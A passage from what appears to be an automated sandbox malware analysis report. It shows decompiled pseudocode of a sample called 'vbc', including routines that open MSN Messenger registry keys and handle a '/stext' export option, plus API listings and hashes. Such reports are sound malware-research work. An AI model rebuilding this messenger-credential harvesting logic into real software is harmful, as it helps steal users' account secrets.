			E0040F1F1(0x104, &_v40, _v8, &_v40, &_v300);
			RegCloseKey(_v8);
		}
		strcpy(_t37, &_v300);
		return 0 | *_t37 != 0x00000000;
	} else {
		_t32 = *0x41851c(0, _t37, _t38, 0); // executed
		return _t32;
	}
}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F41D: LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,73B74DE0,?,00000000), ref: 0040F42B
                                                                                                                                                                          • Part of subcall function 0040F41D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                                                                                                                                                                        • memset.MSVCRT ref: 0040F51F
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                                                                                                                                                                        • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                                                                                                                                                                          • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040F53A, 0040F54A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                        • API String ID: 181880968-2036018995
                                                                                                                                                                        • Opcode ID: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                        • Instruction ID: 8c400c1df07908664f594f880775229253182a5e7b911f92c7f22337ad7f8634
                                                                                                                                                                        • Opcode Fuzzy Hash: 688813e34a40ff9dac7194856c9665e444ed430276b4d0f07d4d5b497ec3e936
                                                                                                                                                                        • Instruction Fuzzy Hash: 34119971801114BADB30AA989C899DF77AC9715308F5400BBFD51B2593D6385F9C8A99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00403946(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                        				char _v528;
                                                                                                                                                                        				intOrPtr _v540;
                                                                                                                                                                        				char _v796;
                                                                                                                                                                        				char _v1052;
                                                                                                                                                                        				void* _v1056;
                                                                                                                                                                        				void* _v1060;
                                                                                                                                                                        				int _v1064;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				long _t23;
                                                                                                                                                                        				void** _t24;
                                                                                                                                                                        				long _t26;
                                                                                                                                                                        				int _t32;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        
                                                                                                                                                                        				_t52 = __fp0;
                                                                                                                                                                        				_v540 = 0x413eb0;
                                                                                                                                                                        				E004046E1( &_v528);
                                                                                                                                                                        				_t32 = 0;
                                                                                                                                                                        				_v1052 = 0;
                                                                                                                                                                        				_v796 = 0;
                                                                                                                                                                        				_v1064 = 0;
                                                                                                                                                                        				do {
                                                                                                                                                                        					if(_v1064 != _t32) {
                                                                                                                                                                        						__eflags = _v1064 - 1;
                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                        							_t21 = E0040DC39( &_v1052, __eflags); // executed
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                        							if(_t23 != 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t24 =  &_v1060;
                                                                                                                                                                        								goto L4;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
                                                                                                                                                                        						if(_t26 != 0) {
                                                                                                                                                                        							L5:
                                                                                                                                                                        							_t21 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t24 =  &_v1056;
                                                                                                                                                                        							L4:
                                                                                                                                                                        							_t21 = E0040DB04( &_v1052, _t24);
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t32 = 0;
                                                                                                                                                                        					if(_t21 != 0) {
                                                                                                                                                                        						E004038A9(_t52, _a4,  &_v1052);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v1064 = _v1064 + 1;
                                                                                                                                                                        				} while (_v1064 <= 2);
                                                                                                                                                                        				return E004047FB( &_v528);
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040399F
                                                                                                                                                                          • Part of subcall function 0040DC39: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040DD05
                                                                                                                                                                          • Part of subcall function 0040DC39: strlen.MSVCRT ref: 0040DD15
                                                                                                                                                                          • Part of subcall function 0040DC39: strcpy.MSVCRT(?,?), ref: 0040DD26
                                                                                                                                                                          • Part of subcall function 0040DC39: LocalFree.KERNEL32(?), ref: 0040DD33
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039D1
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\MSNMessenger, xrefs: 00403999
                                                                                                                                                                        • Software\Microsoft\MessengerService, xrefs: 004039CB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
• API String ID: 1910562259-1741179510
• Opcode ID: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
• Instruction ID: a8690c8f59c2d6ddd84299c782105f2e65a9bc437c951c5f77a69b85a32d1474
• Opcode Fuzzy Hash: cd4cad58a6bbdb2152182e06e1211f683bfeac5af0318659dfdfa5e05705f839
• Instruction Fuzzy Hash: 1111D8B1108309AED320EE5198818ABBFEC9B95355F50843FF544A2081D3789A4DCAAB
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040F37C(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
	struct HRSRC__* _t12;
	void* _t16;
	void* _t17;
	signed int _t26;
	signed int _t29;
	signed int _t33;
	struct HRSRC__* _t35;
	signed int _t36;

	_t12 = FindResourceA(_a4, _a12, _a8); // executed
	_t35 = _t12;
	if(_t35 != 0) {
		_t33 = SizeofResource(_a4, _t35);
		if(_t33 > 0) {
			_t16 = LoadResource(_a4, _t35);
			if(_t16 != 0) {
				_t17 = LockResource(_t16);
				if(_t17 != 0) {
					_a4 = _t33;
					_t29 = _t33 * _t33;
					_t36 = 0;
					_t7 =  &_a4;
					 *_t7 = _a4 >> 2;
					if( *_t7 != 0) {
						do {
							_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
							_t36 = _t36 + 1;
							_t29 = _t26;
						} while (_t36 < _a4);
					}
					 *0x418110 =  *0x418110 + _t29 ^ _t33;
				}
			}
		}
	}
	return 1;
}

0x0040f389
0x0040f38f
0x0040f393
0x0040f3a0
0x0040f3a4
0x0040f3aa
0x0040f3b2
0x0040f3b5
0x0040f3bd
0x0040f3c1
0x0040f3c4
0x0040f3c7
0x0040f3c9
0x0040f3c9
0x0040f3cd
0x0040f3d0
0x0040f3e0
0x0040f3e2
0x0040f3e6
0x0040f3e6
0x0040f3ea
0x0040f3f4
0x0040f3f4
0x0040f3bd
0x0040f3b2
0x0040f3f9
0x0040f3ff

APIs
• FindResourceA.KERNEL32(?,?,?), ref: 0040F389
• SizeofResource.KERNEL32(?,00000000), ref: 0040F39A
• LoadResource.KERNEL32(?,00000000), ref: 0040F3AA
• LockResource.KERNEL32(00000000), ref: 0040F3B5
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
• Instruction ID: 02aaebfec467b3bf7519b160cf801d0b857f87d6ebd9b35fbb0925b6dc32657f
• Opcode Fuzzy Hash: 9cd59cfcab74544fb09ebac2717695010326dcaa36405c725c3e94a77d8c1a91
• Instruction Fuzzy Hash: B601D6327002156BCB294FA5DC45A9BBFAEFF857A1704803AFC09E72A1DB70C905D6C8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
E0040F0E3(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
	void _v8199;
	char _v8200;
	void* __ebx;
	int _t23;
	CHAR* _t31;

	E00412360(0x2004, __ecx);
	_v8200 = 0;
	if(_a4 == 0) {
		memset( &_v8199, 0, 0x2000);
		GetPrivateProfileStringA(_a8, _a12, 0x41344f,  &_v8200, 0x2000, _a20); // executed
		_t23 = E0040680B( &_v8200, __edi, _a16);
	} else {
		memset( &_v8199, 0, 0x2000);
		_t31 =  &_v8200;
		E00406792(_t31, _a16,  *__edi);
		_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
	}
	return _t23;
}

0x0040f0eb
0x0040f0f6
0x0040f0fc
0x0040f146
0x0040f164
0x0040f174
0x0040f0fe
0x0040f10b
0x0040f112
0x0040f11b
0x0040f12f
0x0040f12f
0x0040f17e

APIs
• memset.MSVCRT ref: 0040F10B
  • Part of subcall function 00406792: sprintf.MSVCRT ref: 004067CA
  • Part of subcall function 00406792: memcpy.MSVCRT ref: 004067DD
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040F12F
• memset.MSVCRT ref: 0040F146
• GetPrivateProfileStringA.KERNEL32(?,?,0041344F,?,00002000,?), ref: 0040F164
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3143880245-0
                                                                                                                                                                        • Opcode ID: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                                                                                                                                                                        • Instruction ID: bc019f7bd72990c6dd937b38e23e5507a0673011dafb680486f8cad4f2b6b185
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d5fc167f86d686615e01c1cacfdddd6df1b8ca8c3ebe4bad4095cdeb2aac3fe
                                                                                                                                                                        • Instruction Fuzzy Hash: DF01657240421DAFEF16AF50DD89EDB7B79EF04344F104076B609A1052D6359A64DB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 72%
E004123F2() {
    intOrPtr _t1;
    intOrPtr _t2;
    intOrPtr _t3;
    intOrPtr _t4;

    // Releases the four global buffers that E004079E7 (below) allocates on
    // first use. L00412096 is the import tagged "??3@" in the APIs section
    // that follows, i.e. the MSVC-mangled name of operator delete.
    _t1 =  *0x418528;
    if(_t1 != 0) {
        _push(_t1);
        L00412096();
    }
    _t2 =  *0x418530;
    if(_t2 != 0) {
        _push(_t2); // executed
        L00412096(); // executed
    }
    _t3 =  *0x41852c;
    if(_t3 != 0) {
        _push(_t3);
        L00412096();
    }
    _t4 =  *0x418534;
    if(_t4 != 0) {
        _push(_t4); // executed
        L00412096(); // executed
        return _t4;
    }
    return _t4;
}

Addresses: 0x004123f2, 0x004123f9, 0x004123fb, 0x004123fc, 0x00412401, 0x00412402, 0x00412409, 0x0041240b, 0x0041240c, 0x00412411, 0x00412412, 0x00412419, 0x0041241b, 0x0041241c, 0x00412421, 0x00412422, 0x00412429, 0x0041242b, 0x0041242c, 0x00000000, 0x00412431, 0x00412432

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
• Instruction ID: d787685a6615fa8e7b12f25043f2ee1a52758ce9b2ab1ab1a3353857822e9c29
• Opcode Fuzzy Hash: fb7313e2089ba82f806a054faa6efc2dc291e3dbde93792c84ca6474672037a6
• Instruction Fuzzy Hash: 8FE012703003206A8E30EB7ABF41AC327CDAA18351394C02EF609D2282DEA8DCE0C42C
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 78%
E004079E7() {
    void* _t13;
    signed int _t16;
    signed int _t18;
    signed int _t27;
    signed int _t29;
    intOrPtr _t33;

    // One-time initialisation guarded by the global at 0x418540: on the first
    // call it records three sizes (0x8000, 0x100, 0x1000) and allocates four
    // global buffers through L00412090, the import tagged "??2@" in the APIs
    // section below (MSVC-mangled operator new). E004123F2 (above) frees them.
    _t33 =  *0x418540;
    if(_t33 == 0) {
        _push(0x8000);
        *0x418540 = 0x8000;
        *0x418544 = 0x100;
        *0x418548 = 0x1000; // executed
        L00412090(); // executed
        *0x418528 = 0x8000;
        _t27 = 4;
        _t16 =  *0x418544 * _t27; // 0x100 entries of 4 bytes
        _push( ~(0 | _t33 > 0x00000000) | _t16);
        L00412090();
        *0x418530 = _t16;
        _t29 = 4;
        _t18 =  *0x418544 * _t29; // second 0x100 x 4-byte table
        _push( ~(0 | _t33 > 0x00000000) | _t18);
        L00412090();
        _push( *0x418548);
        *0x418534 = _t18; // executed
        L00412090(); // executed
        *0x41852c = _t18;
        return _t18;
    }
    // Already initialised: the decompiler leaves the return value undefined here.
    return _t13;
}

Addresses: 0x004079e7, 0x004079ee, 0x004079f5, 0x004079f6, 0x004079fb, 0x00407a05, 0x00407a0f, 0x00407a14, 0x00407a22, 0x00407a23, 0x00407a2c, 0x00407a2d, 0x00407a32, 0x00407a40, 0x00407a41, 0x00407a4a, 0x00407a4b, 0x00407a50, 0x00407a56, 0x00407a5b, 0x00407a63, 0x00000000, 0x00407a63, 0x00407a68

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
• Instruction ID: c43431202d49818a45d5cc7318ffcbdb911bff3577ce92db202b1535657ef0fb
• Opcode Fuzzy Hash: 1f5e21fb5e0b6fdb4249ba77804457959e5d31aa328e92d400b1c26414509871
• Instruction Fuzzy Hash: C2F0FFB1542210AEDB94DB34EE467953AE6E708354F10813EE60ACA2B1FFB85440CB0C
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00406104(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
    void* _t8;
    void* _t13;
    signed int _t16;
    void** _t21;
    signed int _t22;

    // Grow-on-demand array helper: *__eax holds the element capacity, *__edi
    // the buffer, _a4 the element size and _a8 the growth step. If the index
    // in __edx already fits, nothing is done; otherwise the capacity is raised
    // in steps of _a8 until it exceeds __edx, a new buffer is allocated, the
    // old contents are copied across and the old buffer is freed.
    _t21 = __edi;
    _t22 =  *__eax;
    if(__edx < _t22) {
        return 0;
    } else {
        _t13 =  *__edi;
        do {
            *__eax =  *__eax + _a8;
            _t16 =  *__eax;
        } while (__edx >= _t16);
        _t8 = malloc(_t16 * _a4); // executed
        *__edi = _t8;
        if(_t22 > 0) {
            if(_t8 != 0) {
                memcpy(_t8, _t13, _t22 * _a4);
            }
            free(_t13);
        }
        // Non-zero only if the reallocation succeeded.
        return 0 |  *_t21 != 0x00000000;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • malloc.MSVCRT ref: 00406120
                                                                                                                                                                        • memcpy.MSVCRT ref: 00406138
                                                                                                                                                                        • free.MSVCRT(00000000,00000000,73B74DE0,00406B78,00000001,?,00000000,73B74DE0,00406EF2,00000000,?,?), ref: 00406141
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemallocmemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3056473165-0
                                                                                                                                                                        • Opcode ID: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                                                                                                                                                                        • Instruction ID: 359978e28c917f6ac826eaac10a3cae38cc8b637956f46d5a6e637dfc07492fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c99a99ae30e83ce40482d8e5bccf8072ec36ae410a4a270b365b928ce6b5d38
                                                                                                                                                                        • Instruction Fuzzy Hash: DFF089726052229FC708AF76A98145BB79DAF48354712487FF505E7282DB38DCA0C7A4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E0040BAB7(void* __edi, void* __eflags) {
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				void* _t42;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				void* _t51;
                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                        
                                                                                                                                                                        				_t54 = __eflags;
                                                                                                                                                                        				_t49 = __edi;
                                                                                                                                                                        				_t38 = 0;
                                                                                                                                                                        				E00402393( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
                                                                                                                                                                        				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                                                                                                                                                        				E00401E4A(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
                                                                                                                                                                        				_t24 =  *((intOrPtr*)(__edi + 0x37c));
                                                                                                                                                                        				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
                                                                                                                                                                        					_t51 = 0x41344f;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
                                                                                                                                                                        						_t45 = 0;
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
                                                                                                                                                                        					}
                                                                                                                                                                        					_t51 = _t45;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(_t51);
                                                                                                                                                                        				_push("/stext");
                                                                                                                                                                        				L00412072();
                                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                                        					_t52 = E0040BA21(_t24, _t51);
                                                                                                                                                                        					__eflags = _t52 - _t38;
                                                                                                                                                                        					if(_t52 <= _t38) {
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t52 = 1;
                                                                                                                                                                        					L9:
                                                                                                                                                                        					E0040B031(_t49, _t38); // executed
                                                                                                                                                                        					E0040A6C6(_t49);
                                                                                                                                                                        					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
                                                                                                                                                                        					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
                                                                                                                                                                        						_t42 = 0x41344f;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
                                                                                                                                                                        						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
                                                                                                                                                                        							_t42 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
                                                                                                                                                                        					E00409C9C( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
                                                                                                                                                                        					_t38 = 1;
                                                                                                                                                                        					E0040B1DC(_t49);
                                                                                                                                                                        					L15:
                                                                                                                                                                        					return _t38;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

APIs
  • Part of subcall function 00401E4A: memset.MSVCRT ref: 00401E6C
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E85
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E93
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401ED9
  • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401EE7
• _stricmp.MSVCRT(/stext,0041344F,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BB0B
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strlen$_stricmpmemset
• String ID: /stext
• API String ID: 3575250601-3817206916
• Opcode ID: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
• Instruction ID: f8692cde8425b7317fc14f1eb66aa5838d4e8645dd66f9f31b24f8adae3a6e9d
• Opcode Fuzzy Hash: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
• Instruction Fuzzy Hash: 20213E707141119FC368AF29C8D1A66B3A8FB04318B15827FE41AA7692C779EC518BCD
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040625C() {
    struct tagLOGFONTA _v64;
    struct HFONT__* _t6;

    // Subcall fills the LOGFONTA (memset + strcpy of the face name, see the API list below):
    // face "Arial", height 0xe, fourth argument 0.
    E0040619B( &_v64, "Arial", 0xe, 0);
    _t6 = CreateFontIndirectA( &_v64); // executed
    return _t6; // HFONT handle, or NULL if the font could not be created
}

Addresses: 0x0040626e 0x0040627a 0x00406281

APIs
  • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
  • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
• CreateFontIndirectA.GDI32(?), ref: 0040627A
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CreateFontIndirectmemsetstrcpy
• String ID: Arial
• API String ID: 3275230829-493054409
• Opcode ID: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
• Instruction ID: 6f23277ce9f10cc220d5cb12b38cfb89722835dabc034d80cc056b5664af2580
• Opcode Fuzzy Hash: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
• Instruction Fuzzy Hash: 8FD01270D4020D77E610FBA0FC07FC97BAC5B00B05F504431B901F50E6FAE8E2598699
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Dynamic-import helper. __esi points at a record whose layout is inferred from the
// accesses below: DLL name at +0, export name at +0xff, module handle at +0x200,
// success flag at +0x204, resolved export address at +0x208.
E004047AA(CHAR* __esi, void* __eflags) {
    struct HINSTANCE__* _t8;
    char _t12;
    char* _t15;
    CHAR* _t17;

    _t17 = __esi;
    E004047FB(__esi);                 // release any module this record already holds
    _t8 = LoadLibraryA(__esi);        // executed
    __esi[0x200] = _t8;               // store module handle
    if(_t8 != 0) {
        _t12 = GetProcAddress(_t8,  &(__esi[0xff]));
        __esi[0x208] = _t12;          // store resolved export address
        if(_t12 != 0) {
            __esi[0x204] = 1;         // both load and lookup succeeded
        }
    }
    _t15 =  &(_t17[0x204]);
    if( *_t15 == 0) {
        E004047FB(_t17);              // lookup failed: unload the module again
    }
    return  *_t15;                    // success flag
}

Addresses: 0x004047aa 0x004047ac 0x004047b2 0x004047ba 0x004047c0 0x004047ca 0x004047d2 0x004047d8 0x004047da 0x004047da 0x004047d8 0x004047e5 0x004047ee 0x004047f2 0x004047f2 0x004047fa

APIs
  • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
• LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
• GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID:
• API String ID: 145871493-0
• Opcode ID: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
• Instruction ID: a05247dfa83e1e5897bdf1ebfda0bf15c3173a66790072ff667e3a7d903ceddc
• Opcode Fuzzy Hash: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
• Instruction Fuzzy Hash: C6F0E5B46007038BD720DF39D849797B7E8AF45701F00853EF166E3185E778A641C758
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetPrivateProfileIntA.KERNEL32 ref: 0040F1A6
  • Part of subcall function 0040F097: memset.MSVCRT ref: 0040F0B5
  • Part of subcall function 0040F097: _itoa.MSVCRT ref: 0040F0CC
  • Part of subcall function 0040F097: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040F0DB
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PrivateProfile$StringWrite_itoamemset
• String ID:
• API String ID: 4165544737-0
• Opcode ID: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
• Instruction ID: ef80bc42b69c7626de0f5e8b39bb4bd6d74a87ec05759e80c101291bc1ad5009
• Opcode Fuzzy Hash: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
• Instruction Fuzzy Hash: 22E0B632004209FBCF125F90EC01AA93FA6FF04315F148479F95C14961E33295B4AB84
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Counterpart of E004047AA: resets the dynamic-import record at __eax
// (success flag at +0x204, module handle at +0x200) and unloads the module.
E004047FB(void* __eax) {
    struct HINSTANCE__* _t5;
    signed int* _t7;

     *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;  // clear success flag
    _t7 = __eax + 0x200;                                   // module handle slot
    _t5 =  *_t7;
    if(_t5 != 0) {
        _t5 = FreeLibrary(_t5); // executed
